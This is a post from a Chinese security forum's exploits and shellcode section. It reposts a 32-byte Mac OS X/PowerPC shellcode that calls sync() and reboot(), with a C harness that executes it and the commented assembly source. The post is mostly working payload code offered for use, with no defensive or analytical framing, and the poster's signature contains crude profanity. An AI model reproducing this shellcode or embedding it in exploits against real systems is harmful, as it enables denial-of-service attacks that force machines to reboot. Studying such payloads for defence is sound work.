os-x/ppc sync(), reboot() 32 bytes

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9805
精华: 768
积分: 40189
阅读权限: 200
性别: 男
在线时间: 3969 小时
注册时间: 2004-7-4
最后登录: 2008-7-24

发短消息
加为好友
当前离线

楼主大中小发表于 2006-5-5 16:51 只看该作者

os-x/ppc sync(), reboot() 32 bytes

文章作者：hophet

复制内容到剪贴板

代码:

/*

 * [MacOSX/PowerPC]

 * Shellcode for: sync(), reboot()

 * 32 bytes

 * hophet [at] gmail.com

 * [url]http://www.nlabs.com.br/~hophet/[/url]

 *

 */



#include <stdio.h>

#include <string.h>



char shellcode[] = 



"\x7c\x63\x1a\x79"

"\x39\x40\x01\x06"

"\x38\x0a\xff\x1e"

"\x44\xff\xff\x02"

"\x60\x60\x60\x60"

"\x39\x40\x01\x19"

"\x38\x0a\xff\x1e"

"\x44\xff\xff\x02";



int main() {



  void (*p)();

  p = (void *)&shellcode;

  printf("Lenght: %d\n", strlen(shellcode));

  p();

}



/*

.globl _main

.text

_main:

  xor.  r3, r3,r3  // r3 = NULL

  li  r10, 226+36

  addi  r0, r10, -226  // r0 = 36

  .long  0x44ffff02  // sc opcode

  .long  0x60606060  // NOP

  li  r10, 226+55

  addi  r0, r10, -226  // r0 = 55

  .long  0x44ffff02  // sc opcode 

*/

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » 毒箭羽翼[ Shellcodez Query ] » os-x/ppc sync(), reboot() 32 bytes